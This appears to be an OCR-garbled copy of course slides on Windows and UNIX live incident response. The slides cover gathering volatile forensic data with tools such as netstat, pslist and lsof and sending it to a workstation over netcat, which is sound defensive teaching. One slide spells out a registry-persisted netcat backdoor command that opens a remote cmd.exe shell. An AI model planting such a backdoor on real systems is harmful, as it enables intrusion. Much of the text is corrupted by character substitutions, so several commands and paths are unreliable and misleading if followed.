windows live response
TRANSCRIPT
-
8/10/2019 Windows Live Response
1/14
Windows Live ResponseChapter 1
Live Incident Response Process
Start a netcat server on forensic workstation with the followingcommand:nc v l p 2222>command.txt
On the victim computer you will want to run a command to collect liveresponse data.The data can be sent from the victim computer with the followingcommand:
command| nc forensic_workstation_ip_address 2222
ip address of forensic worstation
A simple MD checksum of command.t!t can be calculated so that youmay prove its authenticity at a later date:
md!s"m # command.txt > command.md!
"ou will always want to use the #b command$line switch. md!s"misavailable in the %ygwin utilities from www.c$%win.com.
A variant of netcat is named cryptcat&http:''sourceforege.net'pro(ects'cryptcat ) should be used because itencrypts all fo the data across the T%* channel. +ecause the data isencrypted, intruders will not be able to see what you are collecting.
&nal$'in% (olatile )ata1* +$stem )ate and ,ime
The time and dare are simply collected by issuing the timeand datecommands at the prompt.
2* C"rrent -etwor Connections-e view a machines network connections by issuing the netstatcommand. -e specify the #an /ags with netstat to retrieve all of thenetwork connections and the raw 0* addresses instead of the 1ully2uali3ed Domain 4ames &12D4)
netstat an
1
http://www.cygwin.com/http://sourceforege.net/projects/cryptcathttp://sourceforege.net/projects/cryptcathttp://www.cygwin.com/ -
8/10/2019 Windows Live Response
2/14
Port ! /le sharin% port 0-,I3+ r"ns on this port*Port 21 4,P portPort 56!5 -att$+erver 0(IL*
Windows Live ResponseChapter 1
5se www.portsdb.orgto 3nd out what services run on ports.
*orts above 6789 typically are ephemeral ports.
5* 3pen ,CP or 7)P Ports and *xec"ta#les 3penin% ,CP or7)P Ports5se 4Portto e!amine strange ports that are open on the machine tolink to the e!ecutables that opened them. This can be found atwww.foundstone.com.
ename your netcatbinary to t8-C.9to symboli;e that it istrusted.
!* Cached -,I3+ -ame ,a#les-indows &up until version 877
-
8/10/2019 Windows Live Response
3/14
To learn the processes the attacker e!ecuted use the pslisttool fromthe Ps,oolssuite distributed from www.s$sinternals.com.
Windows Live Response
Chapter 1
The 3rst several lines can be system processes based on the lengthyelapsed running time. This is indicative of processes running sincestartup, which are typical system processes.
Psxecis a tool distributed from www.sysinternals.comthat enables avalid user to connect from one Microsoft -indows machine to anotherand e!ecute a command over a -etI3+ connection. Attackers usethis tool to typically run cmd.exe. 1irst, *s>!ec will only open achannel if you supply proper administrator$level credentials. Therefore
the attacker has an administrator$level password. Second, the attackerknows one of the passwords and password may work on othermachines in the enterprise. Third, the attacker must be running aMicrosoft -indows system on his attacking machine to e!ecute *s>!ec.
One of the 3rst things attackers usually do when they gain acces to asystem is to transfer their tools to a victim machine.
!ec and *s1ile will reveal the 4et+0OS name of the computer that isattacking. Once you sei;e the attackers computer, you may want tosearch for the 4et+0OS name as a keyword on the attackers computer.
12* Process ?emor$ )"mps
3
http://www.sysinternals.com/http://www.sysinternals.com/http://www.sysinternals.com/http://www.sysinternals.com/ -
8/10/2019 Windows Live Response
4/14
-e need to capture the memory space of the suspect processes.Details on structure, organi;ation, and management of memory onthese operating systems, we recommend the e!cellent reference,Inside Windows 2000, Third Edition by David Solomon andark !"ssinovich#
Windows Live ResponseChapter 1
Microsoft provides a utility called "serd"mp.exefor the -indows 4Tfamily of operating systems. This tool is a component of the MicrosoftO>M Support tools package available at:
http:''download.microsoft.com'download'win8777srv'5tility'4$5S'Oem net "se B@ AA1=5.
-
8/10/2019 Windows Live Response
5/14
Sample output:CommandLine@ Dnc d L n p :=
-
8/10/2019 Windows Live Response
6/14
)@A>dd.exe [email protected]$sicalmemor$ofF'@ARWWW8f"ll8memor$8d"mp.dd #sF=dd.ece ifFAA.Aph$sicaldrive=ofF'@ARWWW8ph$sicaldrive=.dd #sF=
-
8/10/2019 Windows Live Response
7/14
-e can capture the complete registry in a rather cryptic format byusing egDmp without command$line options. -e can see the keyAMNO8L3C&L8?&CMI-A+oftwareA?icrosoftAWindowsAC"rrent(ersionwith three sub keys: un, unOnce and unOnce>!. Any valuesin R"nsignify programs that will be e!ecuted when the system starts
up.
0f you want to attack, you can place the following command in theregistry to automatically open a backdoor:
nc d L p 1==== e C@AwinntAs$stem52Acmd.exe
5* ,he &"ditin% Polic$
Windows Live ResponseChapter 1
-in 4T and -in 8777 do not have auditing turned on by default,therefore, there are no security$related logs. The command todetermine the auditing policy is a"ditpol. Auditpol is distributed withMicrosofts resource kits.
* & Mistor$ of Lo%ins
A history of logins can be obtained with the -,Lastcommand,distributed by www.foundstone.com. -,Lastis run without command$
line arguments to get all of the login info. 0t is very important toenable auditing.
!* +$stem vent Lo%s
There are typically three types of event logs on a -indows machine.$ Security$ Application$ System
The command *sBogBist within the *sTools suite distributed atwww.sysinternals.comwill e!tract these logs into an easy to readformat.
un:pslo%list s x sec"rit$
7
http://www.foundstone.com/http://www.sysinternals.com/http://www.foundstone.com/http://www.sysinternals.com/ -
8/10/2019 Windows Live Response
8/14
The #s switch tells psloglist to dump each event on a single line. The #! switch tells psloglist to dump the e!tended information for eachevent.
:* 7ser &cco"nts
5se pwd"mpwhich dumps the user accounts.
6* II+ Lo%s
"ou cannot block what you must allow in.
The 00S -eb server writes any activity to logs in theC@AwinntAs$stem52Alo%/lesdirectory by default. To see what is inthe logs, t$pethem out.
1irst, e!ecute this on the forensic workstation:
nc v l p 2222 > ex=5=
-
8/10/2019 Windows Live Response
9/14
-hen attacks are successful against a vulnerable server, it causes the-eb server to crash so activity is not logged in the 00S log. The -ebserver should never access the cmd.e!e command shell.
;* +"spicio"s 4iles
To transfer any suspicious 3le , run the following on the forensicworkstation:
-c v l p 2222 > $lename
Then, transfer the 3le named $lenameby using t$pe:
t$pe $lename| nc forensic8worstation8ip8address 2222
P"ttin% It &ll ,o%ether
[email protected]%readin%8roomwhitepapersthreats"nicodeGv"lnera#ilit$Gwh$8!;
7-I9 Live ResponseChapter 2
On forensic workstation, run:
nc v l p 1==== > command.txt
On the victim computer, run:
command| nc forensic_workstation_ip_address 1====
emember to press %TB$% to break the netcatsession.
un:?d!s"m # command.txt > command.md!
1* +$stem )ate and ,ime
un:)ate
2* C"rrent -etwor Connections
un:netstat an
9
http://www.sans.org/reading_room/whitepapers/threats/unicode-vulnerability-why_458http://www.sans.org/reading_room/whitepapers/threats/unicode-vulnerability-why_458http://www.sans.org/reading_room/whitepapers/threats/unicode-vulnerability-why_458http://www.sans.org/reading_room/whitepapers/threats/unicode-vulnerability-why_458 -
8/10/2019 Windows Live Response
10/14
*ort 6 is the port on which the printer daemon typically listens.Doing a @uick search for Kedhat L.7 and the printer daemon &lpd) onwww.securityfocus.comyou see that this is a vulnerable T%* port.
5* 3pen ,CP or 7)P Ports
un the following to see the process number that opened the port.This only works on Binu! and will not work on other /avors of 540C:netstat anp
The 540C version of 1*ort is lsoffor KBist Open 1iles. lsofis the singlemost powerful tool in the Bive esponse toolkit for 5ni! systems.
un:lsof n
7-I9 Live ResponseChapter 2
A good source on loaded kernel modules is the book: Malware: 1ightingMalicious %ode by >d Soudis.
* R"nnin% Processes
un to see list of all the running processes on the system and the users
running them:ps a"x
!* 3pen 4iles
un:Lsof
:* ,he Internal Ro"tin% ,a#le
netstat rn
6* Loaded Nernel ?od"les
un:lsmod
;* ?o"nted 4ile +$stems
10
http://www.securityfocus.com/http://www.securityfocus.com/ -
8/10/2019 Windows Live Response
11/14
un:mo"nt or df
&nal$'in% -onvolatile )ata
1* +$stem (ersion and Patch Level
un to get all the available operating system version information:"name a
un to get package and version number:rpm a
7-I9 Live ResponseChapter 2
2* 4ile +$stem ,ime and )ate +tamps
un:/nd c@A Gprintf HmJ&xJ&,J,xJ,,JCxJC,J7JKJsJpAn
5* 4ile +$stem ?)! Checs"m (al"es
Databases of known hashes of known system 3les are available atwww.hashkeeper.org
To calculate the MD checksum for every 3le on the system, run:4ind Gt$pe f xdev exec md!s"m # Q AJ
* 7sers C"rrentl$ Lo%%ed 3n
5sers who are currently logged on are saved in the varr"n"tmp.lo%
R"n@w
Attackers who want to seriously hamper your investigation can use'ap2, publically available from www.packetstormsecurity.com
!* & Mistor$ of Lo%ins
11
http://www.hashkeeper.org/http://www.packetstormsecurity.com/http://www.hashkeeper.org/http://www.packetstormsecurity.com/ -
8/10/2019 Windows Live Response
12/14
A history of logins is saved in 'var'log'wtmp binary logs.
un:last
)atapipeis a utility that will listen on one port and forward the traNcto another port on another machine.
:* +$slo% Lo%s
The syslog daemon listens for messages from either local programs orother servers on the 0nternet and logs them according to theetcs$slo%.confcon3guration 3le
The two logs relevant to an investigation are varlo%messa%esand
varlo%sec"re. The 3fth 3eld is the message that was logged.-hen buer over/ows occur, they break valid programs. -henprograms break, garbage is typically generated in the log.
7-I9 Live ResponseChapter 2
6* 7ser &cco"nts
>!amine etcpasswdto see whether the intruder has added anyrogue user accounts
A rogue account can have a root directory of ' and more importantly auser 0D of ;ero.
;* 7ser Mistor$ 4iles
Eo to username.bashFhistory t osee 3les that may contain commandsthat failed. 1or e!ample, ps a"xw | %rep datapipe, shows theintruder looking for the keyword datapipe.
$lename
Transfer the 3le named flenameto the forensic workstation:cat $lename| nc forensic_workstation_ip_address 1====
12
-
8/10/2019 Windows Live Response
13/14
+y entering the procdirectory you can see references to runningprocesses and other system information. "ou see directories namedafter integers, such as 6
-
8/10/2019 Windows Live Response
14/14
14